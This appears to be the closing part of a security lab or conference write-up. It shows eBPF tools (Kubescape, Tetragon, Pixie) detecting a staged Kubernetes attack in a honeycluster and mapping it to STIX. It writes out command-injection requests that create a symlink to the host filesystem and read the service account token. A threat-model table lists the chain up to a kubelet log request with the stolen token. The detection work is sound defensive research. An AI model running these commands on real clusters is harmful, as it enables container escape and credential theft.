"y": 4,

"w": 12,

"h": 4

},

"globalFuncOutputName": "dns_flow",

"displaySpec": {

"@type": "types.px.dev/px.vispb.Table"

}

}

]

}



DNS enrichment based on dynamic analysis - aggregate

DNS enrichment based on dynamic analysis

DNS enrichment based on dynamic analysis (this is an ssh-attack)

| Object IoC | Abnormal Generic | Action Specific | Timestamp ON | Timestamp OFF |
|---|---|---|---|---|
| podname=webapp, namespace=webapp | DNS, HTTP | | t last observed | t last dismissed |
| /proc/self/mounts | | symbolic links | t last observed | t last dismissed |
| /proc/self/mounts | | token access | t last observed | t last dismissed |

Step 2 of the attack : the symbolic link

The attacker at this point executes an injection along the lines of:

curl "127.0.0.1:8080/ping.php?ip=1.1.1.1%3Bln%20-s%20/%20/host/var/log/root_link"

And we again see an anomaly pop up:

px run -f /home/laborant/honeycluster/analysis/file_sourcer/kubescape/display_kubescape.pxl

2025-06-16 13:18:48.890042

{"alertName":"Unexpected system call","arguments":

{"syscall":"symlinkat"},

"infectedPID":110988,"md5Hash":"4e79f11b07df8f72e945e0e3b3587177",

"profileMetadata":{"completion":"complete","failOnProfile":true,"name":"replicaset-webapp-mywebapp-67965968bb","status":"completed","type":0},

{"clusterName":"soccluster","containerID":"8b833a0fe65cc5fc3d941ad5b609db17e3810ab9c854e97545cd6573c3dd5937","containerName":"mywebapp-app","hostNetwork":false,"namespace":"webapp","podName":"webapp-mywebapp-67965968bb-p4d5x","podNamespace":"webapp","workloadKind":"Deployment","workloadName":"webapp-mywebapp","workloadNamespace":"webapp"}

Zooming into the compromised pod by selecting the labels from the 2nd anomaly

Now, a symlink is bad. There is no argument, so let's do 2 things:

(1) Double-check that our second tool also saw the symlink on the node

px run -f /home/laborant/honeycluster/analysis/file_sourcer/tetragon/display_tetragon.pxl

2025-06-16 13:18:42.191111 +0000 UTC 001f617b-5c7f-46cf-9a5b-97fa0df40de2 2025-06-16T13:18:41.519556403Z cplane-01 process_exec

{"dedup":"78fd39641f307f66a0cbc98a3bd917deexec",

"parent":{"arguments":"-c \"ping -c 4 1.1.1.1;ln -s / /host/var/log/root_link\"","auid":4294967295,"binary":"/bin/sh","cwd":"/var/www/html","docker":"8b833a0fe65cc5fc3d941ad5b609db1","exec_id":"Y3BsYW5lLTAxOjE5OTY4Mzk4OTc3NDEwOjI4OTIwNA==","flags":"execve clone inInitTree","in_init_tree":true,"parent_exec_id":"Y3BsYW5lLTAxOjczNTE0ODQ3NTM3MDA6MTExMDE0","pid":289204,"pod":{"container":{"id":"containerd://8b833a0fe65cc5fc3d941ad5b609db17e3810ab9c854e97545cd6573c3dd5937","image":{"id":"ghcr.io/k8sstormcenter/webapp@sha256:e323014ec9befb76bc551f8cc3bf158120150e2e277bae11844c2da6c56c0a2b","name":"sha256:c622cf306b94e8a6e7cfd718f048015e033614170f19228d8beee23a0ccc57bb"},"name":"mywebapp-app","pid":33,"start_time":"2025-06-16T09:48:21Z"},"name":"webapp-mywebapp-67965968bb-p4d5x","namespace":"webapp","pod_labels":{"app.kubernetes.io/instance":"webapp","app.kubernetes.io/name":"mywebapp","pod-template-hash":"67965968bb"},"workload":"webapp-mywebapp","workload_kind":"Deployment"},"start_time":"2025-06-16T13:18:38.510351387Z","tid":289204,"uid":33},

"process":{"arguments":"-s / /host/var/log/root_link","auid":4294967295,"binary":"/bin/ln","cwd":"/var/www/html","docker":"8b833a0fe65cc5fc3d941ad5b609db1","exec_id":"Y3BsYW5lLTAxOjE5OTcxNDA4MTgxMDIzOjI4OTI0Ng==","flags":"execve clone inInitTree","in_init_tree":true,"parent_exec_id":"Y3BsYW5lLTAxOjE5OTY4Mzk4OTc3NDEwOjI4OTIwNA==","pid":289246,"pod":{"container":{"id":"containerd://8b833a0fe65cc5fc3d941ad5b609db17e3810ab9c854e97545cd6573c3dd5937","image":{"id":"ghcr.io/k8sstormcenter/webapp@sha256:e323014ec9befb76bc551f8cc3bf158120150e2e277bae11844c2da6c56c0a2b","name":"sha256:c622cf306b94e8a6e7cfd718f048015e033614170f19228d8beee23a0ccc57bb"},"name":"mywebapp-app","pid":35,"start_time":"2025-06-16T09:48:21Z"},"name":"webapp-mywebapp-67965968bb-p4d5x","namespace":"webapp","pod_labels":{"app.kubernetes.io/instance":"webapp","app.kubernetes.io/name":"mywebapp","pod-template-hash":"67965968bb"},"workload":"webapp-mywebapp","workload_kind":"Deployment"},"start_time":"2025-06-16T13:18:41.519555841Z","tid":289246,"uid":33}}

(2) Let's have a look at the threat model of post-exploitation Kubernetes:

| Attack | Step 0 | Step 1 | Step 2 | Step 3 |
|---|---|---|---|---|
| CE_VAR_LOG_SYMLINK | cat /proc/self/mounts | ln -s / /host/var/log/root_link | cat /var/run/secrets/kubernetes.io/serviceaccount/token | curl -sk -H "Authorization: Bearer $KUBE_TOKEN" https://$NODEIP:10250/logs/ |
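
The double check in (1), confirming that a second, independent tool saw the same event, amounts to a join on pod identity and time. A minimal sketch, assuming both tools report timestamps in the same time zone and that the events have already been flattened into simple records (the record layout and `corroborated` are hypothetical; the values are copied from the two outputs above).

```python
from datetime import datetime, timedelta


def corroborated(alert: dict, execs: list, window_s: float = 30.0) -> list:
    """Return Tetragon exec events from the same pod close in time to a Kubescape alert."""
    window = timedelta(seconds=window_s)
    return [
        e for e in execs
        if e["pod"] == alert["pod"]
        and e["namespace"] == alert["namespace"]
        and abs(e["time"] - alert["time"]) <= window
    ]


# Flattened records built from values shown in the two outputs above.
alert = {"pod": "webapp-mywebapp-67965968bb-p4d5x", "namespace": "webapp",
         "syscall": "symlinkat", "time": datetime(2025, 6, 16, 13, 18, 48, 890042)}
execs = [
    {"pod": "webapp-mywebapp-67965968bb-p4d5x", "namespace": "webapp",
     "binary": "/bin/ln", "arguments": "-s / /host/var/log/root_link",
     "time": datetime(2025, 6, 16, 13, 18, 41, 519555)},
]
for e in corroborated(alert, execs):
    print(e["binary"], e["arguments"])
```

The Kubescape alert only names the syscall, while the matching Tetragon record supplies the binary and its arguments, which is what makes the two signals complementary.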

Specific Response

Monitor the service account token via Tetragon (this is a very specific eBPF tool that we use whenever we have a clear idea of what we are looking for and want definitive proof).
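
Once such a trace is in place, picking the relevant hits out of the event stream is straightforward. The sketch below assumes events in Tetragon's JSON export layout (`process_kprobe`, `function_name`, `args[].file_arg.path`) and a hook on `security_file_permission`; the sample event is trimmed and `token_reads` is a hypothetical helper, not part of Tetragon.

```python
SA_TOKEN_DIR = "/run/secrets/kubernetes.io/serviceaccount/"


def token_reads(events: list) -> list:
    """Return (pod, binary, path) for kprobe events that touch the service account token."""
    hits = []
    for ev in events:
        kp = ev.get("process_kprobe")
        if not kp or kp.get("function_name") != "security_file_permission":
            continue
        for arg in kp.get("args", []):
            path = arg.get("file_arg", {}).get("path", "")
            if path.startswith(SA_TOKEN_DIR) and path.endswith("/token"):
                proc = kp["process"]
                hits.append((proc["pod"]["name"], proc["binary"], path))
    return hits


# Trimmed sample event, for illustration.
sample = [{
    "process_kprobe": {
        "process": {"binary": "/bin/cat",
                    "pod": {"namespace": "webapp",
                            "name": "webapp-mywebapp-67965968bb-p4d5x"}},
        "function_name": "security_file_permission",
        "args": [{"file_arg": {"path": SA_TOKEN_DIR + "..2025_06_16_13_51_49.426766093/token"}},
                 {"int_arg": 4}],
    }
}]
print(token_reads(sample))
```

Matching on the directory prefix plus the `/token` suffix accounts for the timestamped directory that the projected volume places in between.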

Step 3: accessing the Token

curl "127.0.0.1:8080/ping.php?ip=1.1.1.1%3Bcat%20/run/secrets/kubernetes.io/serviceaccount/token"

Let's check if our trace picked it up... YES

export-stdout {"process_kprobe":{"process":{"exec_id":"Y3BsYW5lLTAxOjI0ODMyNDk2MDc4MTQyOjM1Nzk3Nw==", "pid":357977, "uid":33, "cwd":"/var/www/html", "binary":"/bin/cat", "arguments":"/run/secrets/kubernetes.io/serviceaccount/token", "flags":"execve clone inInitTree", "start_time":"2025-06-16T14:39:42.607453349Z", "auid":4294967295, "pod":{"namespace":"webapp", "name":"webapp-mywebapp-67965968bb-p4d5x", "container":{"id":"containerd://8b833a0fe65cc5fc3d941ad5b609db17e3810ab9c854e97545cd6573c3dd5937", "name":"mywebapp-app", "image":{"id":"ghcr.io/k8sstormcenter/webapp@sha256:e323014ec9befb76bc551f8cc3bf158120150e2e277bae11844c2da6c56c0a2b", "name":"sha256:c622cf306b94e8a6e7cfd718f048015e033614170f19228d8beee23a0ccc57bb"}, "start_time":"2025-06-16T09:48:21Z", "pid":50}, "pod_labels":{"app.kubernetes.io/instance":"webapp", "app.kubernetes.io/name":"mywebapp", "pod-template-hash":"67965968bb"}, "workload":"webapp-mywebapp", "workload_kind":"Deployment"}, "docker":"8b833a0fe65cc5fc3d941ad5b609db1", "parent_exec_id":"Y3BsYW5lLTAxOjI0ODI5NDg1MzcyNzAwOjM1NzkzMw==", "refcnt":1, "tid":357977, "in_init_tree":true}, "parent":{"exec_id":"Y3BsYW5lLTAxOjI0ODI5NDg1MzcyNzAwOjM1NzkzMw==", "pid":357933, "uid":33, "cwd":"/var/www/html", "binary":"/bin/sh", "arguments":"-c \"ping -c 4 1.1.1.1;cat /run/secrets/kubernetes.io/serviceaccount/token\"", "flags":"execve clone inInitTree", "start_time":"2025-06-16T14:39:39.596748646Z", "auid":4294967295, "pod":{"namespace":"webapp", "name":"webapp-mywebapp-67965968bb-p4d5x", "container":{"id":"containerd://8b833a0fe65cc5fc3d941ad5b609db17e3810ab9c854e97545cd6573c3dd5937", "name":"mywebapp-app", "image":{"id":"ghcr.io/k8sstormcenter/webapp@sha256:e323014ec9befb76bc551f8cc3bf158120150e2e277bae11844c2da6c56c0a2b", "name":"sha256:c622cf306b94e8a6e7cfd718f048015e033614170f19228d8beee23a0ccc57bb"}, "start_time":"2025-06-16T09:48:21Z", "pid":48}, "pod_labels":{"app.kubernetes.io/instance":"webapp", "app.kubernetes.io/name":"mywebapp", "pod-template-hash":"67965968bb"}, "workload":"webapp-mywebapp", "workload_kind":"Deployment"}, "docker":"8b833a0fe65cc5fc3d941ad5b609db1", "parent_exec_id":"Y3BsYW5lLTAxOjczNTE0ODQ0OTM2NzU6MTExMDEz", "tid":357933, "in_init_tree":true}, "function_name":"security_file_permission", "args":[{"file_arg":{"path":"/run/secrets/kubernetes.io/serviceaccount/..2025_06_16_13_51_49.426766093/token", "permission":"-w-r-Sr--"}}, {"int_arg":4}], "return":{"int_arg":0}, "action":"KPROBE_ACTION_POST", "policy_name":"enumerate-service-account", "return_action":"KPROBE_ACTION_POST"}, "node_name":"cplane-01", "time":"2025-06-16T14:39:42.609331037Z"}

Important here: these tokens get accessed all the time; that's how Kubernetes works. But the process tree lets us see that this access happened via injection into the parent process:

"binary":"/bin/sh", "arguments":"-c \"ping -c 4 1.1.1.1;cat /run/secrets/kubernetes.io/serviceaccount/token\""
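The reasoning about the process tree can be sketched in a few lines of Python. This is a minimal sketch, assuming the event arrives as one `export-stdout` line with the field names seen in the trace above (`process_kprobe`, `parent`, `args`, `file_arg`). The shell list, the separator list, and the function names are illustrative assumptions.

```python
import json

# Assumptions for illustration: which parents count as shells and which
# substrings suggest that several commands were chained together.
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash"}
SEPARATORS = (";", "&&", "|", "`", "$(")


def parse_export_line(line):
    """Drop the log prefix (for example 'export-stdout ') and parse the JSON event."""
    return json.loads(line[line.index("{"):])


def token_access_via_injection(event):
    """Return True if a service account token was read by a process whose
    parent is a shell with chained commands in its arguments."""
    kprobe = event.get("process_kprobe")
    if kprobe is None:
        return False
    paths = [a["file_arg"]["path"] for a in kprobe.get("args", []) if "file_arg" in a]
    if not any("serviceaccount" in p and p.endswith("/token") for p in paths):
        return False
    parent = kprobe.get("parent", {})
    if parent.get("binary") not in SHELLS:
        return False
    return any(sep in parent.get("arguments", "") for sep in SEPARATORS)


if __name__ == "__main__":
    # Abridged version of the event above, keeping only the fields that are used.
    line = (
        'export-stdout {"process_kprobe":{"parent":{"binary":"/bin/sh",'
        '"arguments":"-c \\"ping -c 4 1.1.1.1;cat /run/secrets/kubernetes.io/serviceaccount/token\\""},'
        '"args":[{"file_arg":{"path":"/run/secrets/kubernetes.io/serviceaccount/token"}}]}}'
    )
    print(token_access_via_injection(parse_export_line(line)))
```

A token read by the application's own runtime has no shell parent with a `;` in its arguments, so it passes through unflagged. This heuristic is deliberately narrow and would need tuning for workloads that legitimately spawn shells.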

What happened so far 🚨 We found 3 very clear indicators that an attempt at a cluster takeover is imminent! 🚨

The attacker:

- knows the mount location of the logs

- created a symlink to those logs

- accessed the token from within an injected shell
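The three indicators only become alarming in combination. A minimal sketch of that correlation, assuming each tool reports `(pod, indicator)` pairs and that three distinct indicators on one pod justify escalation. The threshold, the indicator names, and the function name are assumptions for illustration.

```python
from collections import defaultdict


def pods_to_escalate(observations, threshold=3):
    """Return, sorted, the pods with at least `threshold` distinct indicators.

    observations: iterable of (pod_name, indicator_name) pairs.
    """
    seen = defaultdict(set)
    for pod, indicator in observations:
        seen[pod].add(indicator)
    return sorted(pod for pod, indicators in seen.items() if len(indicators) >= threshold)


if __name__ == "__main__":
    observations = [
        ("webapp-mywebapp-67965968bb-p4d5x", "read_mounts"),
        ("webapp-mywebapp-67965968bb-p4d5x", "symlink_var_log"),
        ("webapp-mywebapp-67965968bb-p4d5x", "token_via_injected_shell"),
        ("some-other-pod", "read_mounts"),  # hypothetical pod with a single signal
    ]
    print(pods_to_escalate(observations))
```

Counting distinct indicators rather than raw events keeps a single noisy signal from triggering escalation on its own.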

WIP: live demo during talk is under active development



Last step: Visualization in STIX attack trees

We can also analyse visually whether IoCs match the Kubernetes threat model. If they do, they are converted into STIX.

STIX is a Cyber-Threat-Intelligence Sharing Standard

Only several IoCs together amount to proof -- STIX in PIXIE
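To make the STIX step more concrete, here is a minimal sketch that builds STIX 2.1 Indicator objects and a Bundle as plain dictionaries, using only the standard library. How the project itself performs the conversion is not shown in this lab, so the helper names and the example patterns are assumptions.

```python
import json
import uuid
from datetime import datetime, timezone


def make_indicator(name, pattern, now=None):
    """Build a STIX 2.1 Indicator with its required properties as a dict."""
    now = now or datetime.now(timezone.utc)
    ts = now.strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3] + "Z"  # millisecond precision
    return {
        "type": "indicator",
        "spec_version": "2.1",
        "id": f"indicator--{uuid.uuid4()}",
        "created": ts,
        "modified": ts,
        "name": name,
        "pattern": pattern,
        "pattern_type": "stix",
        "valid_from": ts,
    }


def make_bundle(objects):
    """Wrap STIX objects in a Bundle so they can be shared together."""
    return {"type": "bundle", "id": f"bundle--{uuid.uuid4()}", "objects": list(objects)}


if __name__ == "__main__":
    # Illustrative patterns derived from the commands observed in this lab.
    indicators = [
        make_indicator(
            "Symlink into host /var/log",
            "[process:command_line LIKE '%ln -s%var/log%']",
        ),
        make_indicator(
            "Service account token read",
            "[process:command_line LIKE '%/run/secrets/kubernetes.io/serviceaccount/token%']",
        ),
    ]
    print(json.dumps(make_bundle(indicators), indent=2))
```

Keeping the indicators in one bundle mirrors the point above: a single IoC is only a hint, and the set of them is what gets shared as evidence.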

Summary

We are thus working on composing independent eBPF tools into a sovereign Security Operations Center, to capture real-time exposure

- misconfigurations and CVEs of all forms

- SBOMs (software bills of materials), SBoBs (bills of behaviour) and anomalies

- (will) adaptively zoom into anomalies according to the Kubernetes threat model, by deploying on-demand eBPF traces

- confirm suspicions or save forensically -> keep data-volumes manageable

THANK YOU SBA for your support and my contributors !! 🙏

especially R. Kugler, M. Klemen and S. Jakoubi

Major thanks go to the contributors to this work: Berk Gürcay and Dom DelNano, the Kubescape Team and the Tetragon Team

This research was partially funded by EOSC Future INFRAEOSC-03-2020 Grant Agreement Number 101017536

We love musketeers
